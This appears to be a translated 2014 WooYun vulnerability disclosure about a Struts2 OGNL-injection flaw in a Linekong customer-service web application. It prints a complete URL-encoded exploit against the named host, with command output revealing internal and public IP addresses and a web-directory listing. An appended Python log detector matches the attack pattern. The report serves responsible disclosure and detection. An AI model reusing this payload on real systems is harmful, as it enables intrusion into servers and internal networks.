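Vulnerability Summary
Bug ID: wooyun-2014-052781
Title: A Linekong system is exposed (allows direct penetration of the internal network)
Vendor: linekong.com
Author: 啦绯哥
Submitted: 2014-03-04 23:19
Fixed: 2014-04-18 23:20
Published: 2014-04-18 23:20
Vulnerability type: System/service operations misconfiguration
Severity: High
Self-assessed Rank: 15
Status: Confirmed by the vendor
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: none
Vulnerability Details
Disclosure status:
2014-03-04: Details sent to the vendor, awaiting the vendor's handling
2014-03-05: Vendor confirmed; details disclosed to the vendor only
2014-03-15: Details disclosed to core white hats and experts in related fields
2014-03-25: Details disclosed to regular white hats
2014-04-04: Details disclosed to trainee white hats
2014-04-18: Details disclosed to the public
Brief description:
As per the title
Detailed description: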
http://kefu.linekong.com/eService/system/inputLogin.do?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29}
Proof of vulnerability:
Internal network address:
eth0 Link encap:Ethernet HWaddr 00:E0:81:D3:CB:59
inet addr:59.151.39.146 Bcast:59.151.39.191 Mask:255.255.255.192
inet6 addr: fe80::2e0:81ff:fed3:cb59/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3698165411 errors:0 dropped:0 overruns:0 frame:0
TX packets:3285674879 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:2434885196 (2.2 GiB) TX bytes:864802851 (824.7 MiB)
Memory:fbbe0000-fbc00000
eth1 Link encap:Ethernet HWaddr 00:E0:81:D3:CB:5A
inet addr:172.16.1.146 Bcast:172.16.1.255 Mask:255.255.255.0
inet6 addr: fe80::2e0:81ff:fed3:cb5a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:521743597 errors:1 dropped:0 overruns:0 frame:1
TX packets:507251382 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2604270216 (2.4 GiB) TX bytes:178698027 (170.4 MiB)
Memory:fbae0000-fbb00000
Running ls on the web directory, it looks like someone has already been here
drwxrwxr-x 2 jboss jboss 4096 Feb 27 20:13 css
-rw-rw-r-- 1 jboss jboss 630 Mar 31 2011 dateAndDay.jsp
drwxrwxr-x 12 jboss jboss 4096 Feb 27 20:13 datepicker
drwxrwxr-x 9 jboss jboss 4096 Feb 27 20:13 display
drwxrwxr-x 13 jboss jboss 4096 Feb 27 20:13 download
-rw-rw-r-- 1 jboss jboss 4236 Aug 5 2011 error.jsp
-rw-rw-r-- 1 jboss jboss 178 Mar 2 09:22 guige.jsp
drwxrwxr-x 20 jboss jboss 4096 Feb 27 20:13 images
-rw-rw-r-- 1 jboss jboss 8627 Jul 25 2013 index.jsp
drwxrwxr-x 18 jboss jboss 4096 Feb 27 20:13 js
-rw-rw-r-- 1 jboss jboss 2416 Mar 31 2011 jsontest.html
drwxrwxr-x 2 jboss jboss 4096 Feb 27 20:13 META-INF
-rw-rw-r-- 1 jboss jboss 15521 Aug 18 2011 plays.jsp
-rw-rw-r-- 1 jboss jboss 108 Mar 31 2011 redirect.jsp
-rw-rw-r-- 1 jboss jboss 14683 Aug 18 2011 service.jsp
-rw-rw-r-- 1 jboss jboss 13045 Aug 18 2011 use.jsp
-rw-rw-r-- 1 jboss jboss 6278 Mar 2 09:23 version.jsp
drwxrwxr-x 5 jboss jboss 4096 Feb 27 20:13 WEB-INF
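Too many people are after game data these days, so patch this quickly. I strongly recommend that the vendor check its internal network.
Remediation:
1. Patch;
2. Check the internal network servers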
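A log check for the request shape shown under the detailed description, as an added example that is not part of the original report: it percent-decodes each request target and flags a query parameter that begins with `redirect:` followed by an expression opener. The access-log format, client addresses, timestamps and sample lines are constructed assumptions; only the request path comes from the report.

```python
import re
from urllib.parse import unquote

# Parameter prefix seen in the report's request, followed by an
# expression opener (${ or %{) once percent-encoding is removed.
PREFIX_EXPR = re.compile(r"(?:^|[?&;])redirect:\s*[$%]\{", re.IGNORECASE)
# Request field of a combined-format access-log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is also caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (client, decoded_target) for each matching access-log line."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        target = fully_decode(m.group(1))
        query = target.partition("?")[2]
        if PREFIX_EXPR.search("?" + query):
            hits.append((line.split(" ", 1)[0], target))
    return hits

# Constructed sample lines, not taken from the report or the vendor's logs.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2014:10:00:01 +0800] "GET /eService/system/inputLogin.do?redirect%3A%24%7B%23x%3D1%7D HTTP/1.1" 200 12',
    '203.0.113.7 - - [01/Jan/2014:10:00:05 +0800] "GET /eService/system/inputLogin.do?redirect%253A%2524%257B%2523x%253D1%257D HTTP/1.1" 200 12',
    '198.51.100.4 - - [01/Jan/2014:10:03:10 +0800] "GET /eService/system/inputLogin.do?redirect=/index.jsp HTTP/1.1" 200 8627',
    '198.51.100.4 - - [01/Jan/2014:10:03:11 +0800] "GET /eService/index.jsp HTTP/1.1" 200 8627',
]

if __name__ == "__main__":
    for client, target in suspicious_requests(SAMPLE_LOG):
        print(client, target)
```

Requests sent by POST do not show their parameters in the access-log target, so the same match would have to run where request bodies are visible.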
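Copyright notice: when reposting, please credit the source 啦绯哥@乌云 (WooYun)
Vulnerability Response
Vendor response:
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-03-05 10:34
Vendor reply:
A fix is already in progress, thank you very much!
Latest status:
None yet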